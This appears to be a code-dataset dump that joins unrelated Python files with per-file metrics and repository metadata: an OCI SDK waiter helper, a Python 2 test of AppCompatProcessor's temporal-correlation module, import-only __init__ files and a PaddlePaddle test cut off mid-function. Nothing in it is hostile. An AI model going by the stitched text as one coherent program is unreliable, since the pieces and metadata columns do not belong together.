The details to update a Knowledge Base.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.adm.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.adm.ApplicationDependencyManagementClient.update_knowledge_base`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_knowledge_base(knowledge_base_id, update_knowledge_base_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_vulnerability_audit_and_wait_for_state(self, vulnerability_audit_id, update_vulnerability_audit_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.adm.ApplicationDependencyManagementClient.update_vulnerability_audit` and waits for the :py:class:`~oci.adm.models.VulnerabilityAudit` acted upon
to enter the given state(s).
:param str vulnerability_audit_id: (required)
Unique Vulnerability Audit identifier path parameter.
:param oci.adm.models.UpdateVulnerabilityAuditDetails update_vulnerability_audit_details: (required)
The details to update a Vulnerability Audit.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.adm.models.VulnerabilityAudit.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.adm.ApplicationDependencyManagementClient.update_vulnerability_audit`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_vulnerability_audit(vulnerability_audit_id, update_vulnerability_audit_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_vulnerability_audit(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
| 53.910217
| 245
| 0.69942
| 2,196
| 17,413
| 5.307832
| 0.102459
| 0.037234
| 0.046843
| 0.014413
| 0.886496
| 0.873198
| 0.86582
| 0.843686
| 0.824811
| 0.811857
| 0
| 0.002005
| 0.22667
| 17,413
| 322
| 246
| 54.07764
| 0.863582
| 0.481652
| 0
| 0.776978
| 0
| 0
| 0.026342
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057554
| false
| 0
| 0.014388
| 0
| 0.194245
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a59aae8993ab71b5ab8744a3242e701e137415b
| 21,678
|
py
|
Python
|
test/test_tcorr.py
|
0x09AL/appcompatprocessor
|
90c6e1f2cf8d71a5428e6f34ea0a2cbd64a657c6
|
[
"Apache-2.0"
] | null | null | null |
test/test_tcorr.py
|
0x09AL/appcompatprocessor
|
90c6e1f2cf8d71a5428e6f34ea0a2cbd64a657c6
|
[
"Apache-2.0"
] | null | null | null |
test/test_tcorr.py
|
0x09AL/appcompatprocessor
|
90c6e1f2cf8d71a5428e6f34ea0a2cbd64a657c6
|
[
"Apache-2.0"
] | 1
|
2019-11-20T10:57:23.000Z
|
2019-11-20T10:57:23.000Z
|
from __future__ import absolute_import
import logging
from unittest import TestCase
import settings
import sys, traceback
reload(sys)
sys.setdefaultencoding("utf-8")
import os
from AppCompatProcessor import main
from shutil import copyfile
from ShimCacheParser import read_mir, write_it
import tempfile
import appDB
import re, codecs
from test.auxTest import build_fake_DB, add_entry
# Setup the logger
logger = logging.getLogger()
DB = None
def create_ShimCacheTxtFile(fileFullPath):
try:
with file(fileFullPath, 'rb') as xml_data:
(error, entries) = read_mir(xml_data, True)
if not entries:
if error == "":
print "[ShimCacheParser] found no entries for %s" % fileFullPath
settings.logger.error("[ShimCacheParser] found no entries for %s" % fileFullPath)
else:
print "[ShimCacheParser] Error on file %s - [error]" % (fileFullPath, error)
settings.logger.error("[ShimCacheParser] Error on file %s - [error]" % (fileFullPath, error))
return False
else:
write_it(entries, fileFullPath + "-shimcache.txt")
fileFullPath += "-shimcache.txt"
except IOError, err:
print "[ShimCacheParser] Error opening binary file: %s" % str(err)
settings.logger.error("[ShimCacheParser] Error opening binary file: %s" % str(err))
class TestAppTcorr(TestCase):
testset1 = ''
@classmethod
def setup_class(self):
# Build test dataset
self.testset1 = build_fake_DB(1)
@classmethod
def teardown_class(self):
# Remove temp dbs
os.remove(self.testset1)
def BuildTestPath(self, folder):
master_test_folder = os.path.join(
os.path.abspath(os.path.join(os.path.join(os.path.dirname(__file__), os.pardir), os.pardir)),
"appcompatprocessor-DataSets")
load_test_path = os.path.join(master_test_folder, folder)
return load_test_path
def count_lines_regex(self, input_filename, regex_string):
regex = re.compile(regex_string, re.IGNORECASE)
count = 0
with codecs.open(input_filename, 'r', 'UTF8') as inputFile:
content = inputFile.readlines()
for line in content:
if regex.search(line) is not None:
count += 1
return count
def test_TcorrTest_prog1(self):
with appDB.DBClass(self.testset1, settings.__version__) as DB:
DB.appInitDB()
conn = DB.appConnectDB()
# TestHost01
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='AAA.exe', Size=1,ExecFlag='True')
add_entry(DB, "TestHost01", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='BBB.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost01", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='CCC.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost01", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='DDD.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost01", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='EEE.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost01", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='FFF.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost01", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='GGG.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost01", entry_fields)
# TestHost02
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='AAA.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost02", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='BBB.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost02", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='CCC.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost02", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='DDD.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost02", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='EEE.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost02", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='FFF.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost02", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='GGG.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost02", entry_fields)
try:
directCorrelationData = main([self.testset1, "tcorr", "DDD.exe", "-w 1"])
except Exception as e:
print traceback.format_exc()
self.fail(e.message + "\n" + traceback.format_exc())
# Check Names
self.assertEquals(directCorrelationData[0][3], "CCC.exe", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][3], "EEE.exe", "test_TcorrTest_prog1 - Name failed!")
# Check Before
self.assertEquals(directCorrelationData[0][6], 0, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][6], 2, "test_TcorrTest_prog1 - Name failed!")
# Check After
self.assertEquals(directCorrelationData[0][7], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][7], 0, "test_TcorrTest_prog1 - Name failed!")
# Check InvBond
self.assertEquals(directCorrelationData[0][9], "True", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][9], "True", "test_TcorrTest_prog1 - Name failed!")
# Check Total_Count
self.assertEquals(directCorrelationData[0][10], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][10], 2, "test_TcorrTest_prog1 - Name failed!")
try:
directCorrelationData = main([self.testset1, "tcorr", "DDD.exe", "-w 2"])
except Exception as e:
print traceback.format_exc()
self.fail(e.message + "\n" + traceback.format_exc())
# Check Names
self.assertEquals(directCorrelationData[0][3], "CCC.exe", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][3], "EEE.exe", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[2][3], "BBB.exe", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[3][3], "FFF.exe", "test_TcorrTest_prog1 - Name failed!")
# Check Before
self.assertEquals(directCorrelationData[0][6], 0, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][6], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[2][6], 0, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[3][6], 2, "test_TcorrTest_prog1 - Name failed!")
# Check After
self.assertEquals(directCorrelationData[0][7], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][7], 0, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[2][7], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[3][7], 0, "test_TcorrTest_prog1 - Name failed!")
# Check InvBond
self.assertEquals(directCorrelationData[0][9], "True", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][9], "True", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[2][9], "True", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[3][9], "True", "test_TcorrTest_prog1 - Name failed!")
# Check Total_Count
self.assertEquals(directCorrelationData[0][10], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][10], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[2][10], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[3][10], 2, "test_TcorrTest_prog1 - Name failed!")
# Check Weight
self.assertTrue(directCorrelationData[0][8] > directCorrelationData[2][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[0][8] > directCorrelationData[3][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[1][8] > directCorrelationData[2][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[1][8] > directCorrelationData[3][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[0][8] == directCorrelationData[1][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[2][8] == directCorrelationData[3][8], "test_TcorrTest_prog1 - Name failed!")
try:
directCorrelationData = main([self.testset1, "tcorr", "DDD.exe", "-w 3"])
except Exception as e:
print traceback.format_exc()
self.fail(e.message + "\n" + traceback.format_exc())
# Check Names
self.assertEquals(directCorrelationData[0][3], "CCC.exe", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][3], "EEE.exe", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[2][3], "BBB.exe", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[3][3], "FFF.exe", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[4][3], "AAA.exe", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[5][3], "GGG.exe", "test_TcorrTest_prog1 - Name failed!")
# Check Before
self.assertEquals(directCorrelationData[0][6], 0, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][6], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[2][6], 0, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[3][6], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[4][6], 0, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[5][6], 2, "test_TcorrTest_prog1 - Name failed!")
# Check After
self.assertEquals(directCorrelationData[0][7], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][7], 0, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[2][7], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[3][7], 0, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[4][7], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[5][7], 0, "test_TcorrTest_prog1 - Name failed!")
# Check InvBond
self.assertEquals(directCorrelationData[0][9], "True", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][9], "True", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[2][9], "True", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[3][9], "True", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[4][9], "True", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[5][9], "True", "test_TcorrTest_prog1 - Name failed!")
# Check Total_Count
self.assertEquals(directCorrelationData[0][10], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][10], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[2][10], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[3][10], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[4][10], 2, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[5][10], 2, "test_TcorrTest_prog1 - Name failed!")
# Check Weight
self.assertTrue(directCorrelationData[0][8] > directCorrelationData[2][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[0][8] > directCorrelationData[3][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[0][8] > directCorrelationData[4][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[0][8] > directCorrelationData[5][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[1][8] > directCorrelationData[2][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[1][8] > directCorrelationData[3][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[1][8] > directCorrelationData[4][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[1][8] > directCorrelationData[5][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[0][8] == directCorrelationData[1][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[2][8] == directCorrelationData[3][8], "test_TcorrTest_prog1 - Name failed!")
self.assertTrue(directCorrelationData[4][8] == directCorrelationData[5][8], "test_TcorrTest_prog1 - Name failed!")
# TestHost03
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='AAA.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost03", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='BBB.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost03", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='CCC.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost03", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='DDD.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost03", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='EEE.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost03", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='FFF.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost03", entry_fields)
entry_fields = settings.EntriesFields(EntryType=settings.__APPCOMPAT__,
FilePath='C:\Temp', FileName='GGG.exe', Size=1, ExecFlag='True')
add_entry(DB, "TestHost03", entry_fields)
try:
directCorrelationData = main([self.testset1, "tcorr", "DDD.exe", "-w 1"])
except Exception as e:
print traceback.format_exc()
self.fail(e.message + "\n" + traceback.format_exc())
# Check Names
self.assertEquals(directCorrelationData[0][3], "CCC.exe", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][3], "EEE.exe", "test_TcorrTest_prog1 - Name failed!")
# Check Before
self.assertEquals(directCorrelationData[0][6], 0, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][6], 3, "test_TcorrTest_prog1 - Name failed!")
# Check After
self.assertEquals(directCorrelationData[0][7], 3, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][7], 0, "test_TcorrTest_prog1 - Name failed!")
# Check InvBond
self.assertEquals(directCorrelationData[0][9], "True", "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][9], "True", "test_TcorrTest_prog1 - Name failed!")
# Check Total_Count
self.assertEquals(directCorrelationData[0][10], 3, "test_TcorrTest_prog1 - Name failed!")
self.assertEquals(directCorrelationData[1][10], 3, "test_TcorrTest_prog1 - Name failed!")
def _test_TcorrMixed(self):
# Verify that AmCache data doesn't get mixed in with AppCompat in the tcorr module
# Note that we currently print results separately but return a unique structure with aggregates both datasets
load_test_path = self.BuildTestPath("TestData-mini")
# Get temp db name for the test
tempdb = tempfile.NamedTemporaryFile(suffix='.db', prefix='testCase', dir=tempfile.gettempdir())
tempdb.close()
(db_filenameFullPath, db_version, num_hosts, num_instances, num_entries) = main([tempdb.name, "load", load_test_path])
directCorrelationData1 = main([tempdb.name, "tcorr", "net.exe", "-w 3"])
# Check Name
self.assertEquals(directCorrelationData1[0][3], "net1.exe", "test_TcorrTest1 - Name failed!")
# Check Before
self.assertEquals(directCorrelationData1[0][6], 0, "test_TcorrTest1 - Before failed!")
# Check After
self.assertEquals(directCorrelationData1[0][7], 158, "test_TcorrTest1 - After failed!")
load_test_path = self.BuildTestPath("TestData-AmCache")
(db_filenameFullPath2, db_version2, num_hosts2, num_instances2, num_entries2) = main([tempdb.name, "load", load_test_path])
directCorrelationData2 = main([tempdb.name, "tcorr", "net.exe", "-w 3"])
# Remove temp db
os.remove(tempdb.name)
# Check Name
self.assertEquals(directCorrelationData2[0][3], "net1.exe", "test_TcorrTest1 - Name failed!")
# Check Before
self.assertEquals(directCorrelationData2[0][6], 0 + 0, "test_TcorrTest1 - Before failed!")
# Check After
self.assertEquals(directCorrelationData2[0][7], 158 + 21, "test_TcorrTest1 - After failed!")
def _test_TcorrAmCache(self):
load_test_path = self.BuildTestPath("TestData-AmCache")
# Get temp db name for the test
tempdb = tempfile.NamedTemporaryFile(suffix='.db', prefix='testCase', dir=tempfile.gettempdir())
tempdb.close()
(db_filenameFullPath1, db_version1, num_hosts1, num_instances1, num_entries2) = main([tempdb.name, "load", load_test_path])
directCorrelationData1 = main([tempdb.name, "tcorr", "net.exe", "-w 3"])
# Remove temp db
os.remove(tempdb.name)
# Check Name
self.assertEquals(directCorrelationData1[0][3], "net1.exe", "test_TcorrTest1 - Name failed!")
# Check Before
self.assertEquals(directCorrelationData1[0][6], 0, "test_TcorrTest1 - Before failed!")
# Check After
self.assertEquals(directCorrelationData1[0][7], 21, "test_TcorrTest1 - After failed!")
| 65.690909
| 131
| 0.633822
| 2,244
| 21,678
| 5.937611
| 0.097148
| 0.067547
| 0.118883
| 0.143651
| 0.866256
| 0.856199
| 0.853347
| 0.837811
| 0.823852
| 0.803738
| 0
| 0.031026
| 0.246194
| 21,678
| 329
| 132
| 65.890578
| 0.784346
| 0.035658
| 0
| 0.651163
| 0
| 0
| 0.221466
| 0.001294
| 0
| 0
| 0
| 0
| 0.372093
| 0
| null | null | 0
| 0.050388
| null | null | 0.027132
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a6272489566b31903ad9f84c8fe7a8026019409
| 196
|
py
|
Python
|
malib/agents/__init__.py
|
wwxFromTju/malib
|
7cd2a4af55cf1f56da8854e26ea7a4f3782ceea2
|
[
"MIT"
] | 6
|
2021-05-19T10:25:36.000Z
|
2021-12-27T03:30:33.000Z
|
malib/agents/__init__.py
|
wwxFromTju/malib
|
7cd2a4af55cf1f56da8854e26ea7a4f3782ceea2
|
[
"MIT"
] | 1
|
2021-05-29T04:51:37.000Z
|
2021-05-30T06:18:10.000Z
|
malib/agents/__init__.py
|
ying-wen/malib_deprecated
|
875338b81c4d87064ad31201f461ef742db05f25
|
[
"MIT"
] | 1
|
2021-05-31T16:16:12.000Z
|
2021-05-31T16:16:12.000Z
|
from malib.agents.ddpg.maddpg import MADDPGAgent
from malib.agents.ddpg.ddpg import DDPGAgent
from malib.agents.ddpg.ddpg_tom import DDPGToMAgent
from malib.agents.ddpg.ddpg_om import DDPGOMAgent
| 39.2
| 51
| 0.857143
| 30
| 196
| 5.533333
| 0.4
| 0.216867
| 0.361446
| 0.457831
| 0.415663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 196
| 4
| 52
| 49
| 0.922222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6a71222f316c2de57569c472d262b7bb3e6e983d
| 1,986
|
py
|
Python
|
tests/fixtures/__init__.py
|
hboshnak/casper-python-sdk
|
19db9bf3b4720d5b4e133463e5a32fd64f1c33ed
|
[
"Apache-2.0"
] | 11
|
2021-09-27T08:41:18.000Z
|
2022-03-24T11:25:20.000Z
|
tests/fixtures/__init__.py
|
hboshnak/casper-python-sdk
|
19db9bf3b4720d5b4e133463e5a32fd64f1c33ed
|
[
"Apache-2.0"
] | 13
|
2021-09-13T19:08:45.000Z
|
2022-02-08T10:01:12.000Z
|
tests/fixtures/__init__.py
|
hboshnak/casper-python-sdk
|
19db9bf3b4720d5b4e133463e5a32fd64f1c33ed
|
[
"Apache-2.0"
] | 14
|
2021-07-12T10:46:33.000Z
|
2022-03-01T08:25:07.000Z
|
from tests.fixtures.accounts import account_key
from tests.fixtures.accounts import account_hash
from tests.fixtures.accounts import a_test_account
from tests.fixtures.accounts import create_account
from tests.fixtures.accounts import cp1
from tests.fixtures.accounts import cp2
from tests.fixtures.accounts import test_account_1
from tests.fixtures.chain import account_main_purse_uref
from tests.fixtures.chain import block
from tests.fixtures.chain import block_hash
from tests.fixtures.chain import state_root_hash
from tests.fixtures.chain import switch_block
from tests.fixtures.chain import switch_block_hash
from tests.fixtures.contracts import path_to_wasm_auction_bid
from tests.fixtures.contracts import path_to_wasm_auction_bid_withdrawal
from tests.fixtures.contracts import path_to_wasm_delegate
from tests.fixtures.contracts import path_to_wasm_delegate_withdrawal
from tests.fixtures.deploys import a_test_chain_id
from tests.fixtures.deploys import a_test_timestamp
from tests.fixtures.deploys import a_test_ttl_humanized
from tests.fixtures.deploys import a_test_uref
from tests.fixtures.deploys import deploy_params
from tests.fixtures.deploys import deploy_params_static
from tests.fixtures.deploys import a_deploy
from tests.fixtures.iterator_deploy_entities import yield_entities as deploy_entities_iterator
from tests.fixtures.node import CLIENT
from tests.fixtures.node import NODE_HOST
from tests.fixtures.node import NODE_PORT_REST
from tests.fixtures.node import NODE_PORT_RPC
from tests.fixtures.node import NODE_PORT_SSE
from tests.fixtures.vectors import cl_types as cl_types_vector
from tests.fixtures.vectors import cl_values as cl_values_vector
from tests.fixtures.vectors import crypto_checksums
from tests.fixtures.vectors import crypto_hashes
from tests.fixtures.vectors import crypto_key_pairs
from tests.fixtures.vectors import crypto_key_pair_specs
from tests.fixtures.vectors import crypto_signatures
from tests.fixtures.vectors import deploys_1
| 50.923077
| 94
| 0.882175
| 307
| 1,986
| 5.469055
| 0.198697
| 0.203693
| 0.384753
| 0.114354
| 0.816557
| 0.70816
| 0.410363
| 0.121501
| 0.121501
| 0.061942
| 0
| 0.002188
| 0.079557
| 1,986
| 38
| 95
| 52.263158
| 0.916302
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6ab4a72e8368f57446e9d99b840ad51c2c6ccb33
| 16,992
|
py
|
Python
|
python/paddle/fluid/tests/unittests/test_imperative_auto_prune.py
|
grasswolfs/Paddle
|
0c2fff447c7d5b0bbad473a1590872c5343e1e56
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/fluid/tests/unittests/test_imperative_auto_prune.py
|
grasswolfs/Paddle
|
0c2fff447c7d5b0bbad473a1590872c5343e1e56
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/fluid/tests/unittests/test_imperative_auto_prune.py
|
grasswolfs/Paddle
|
0c2fff447c7d5b0bbad473a1590872c5343e1e56
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import paddle.fluid as fluid
import numpy as np
class AutoPruneLayer0(fluid.Layer):
def __init__(self, name_scope):
super(AutoPruneLayer0, self).__init__(name_scope)
self.fc1 = fluid.dygraph.FC(
"FC_1",
5,
param_attr=fluid.initializer.ConstantInitializer(value=2),
bias_attr=False)
self.fc2 = fluid.dygraph.FC(
"FC_2",
5,
param_attr=fluid.initializer.ConstantInitializer(value=2),
bias_attr=False)
def forward(self, x, y):
a = self.fc1(x)
b = self.fc2(y)
c = fluid.layers.mul(a, b)
d = fluid.layers.reduce_mean(c)
return d
class AutoPruneLayer1(fluid.Layer):
def __init__(self, name_scope):
super(AutoPruneLayer1, self).__init__(name_scope)
self.fc1 = fluid.dygraph.FC(
"FC_1",
5,
param_attr=fluid.initializer.ConstantInitializer(value=2),
bias_attr=False)
self.fc2 = fluid.dygraph.FC(
"FC_2",
5,
param_attr=fluid.initializer.ConstantInitializer(value=2),
bias_attr=False)
def forward(self, x, y):
a = self.fc1(x)
b = self.fc2(y)
b.stop_gradient = True
c = fluid.layers.mul(a, b)
d = fluid.layers.reduce_mean(c)
return d
class AutoPruneLayer2(fluid.Layer):
def __init__(self, name_scope):
super(AutoPruneLayer2, self).__init__(name_scope)
self.fc = fluid.dygraph.FC("FC1", size=10, act=None)
self.fc2 = fluid.dygraph.FC("FC2", size=1, act=None)
def forward(self, x, label):
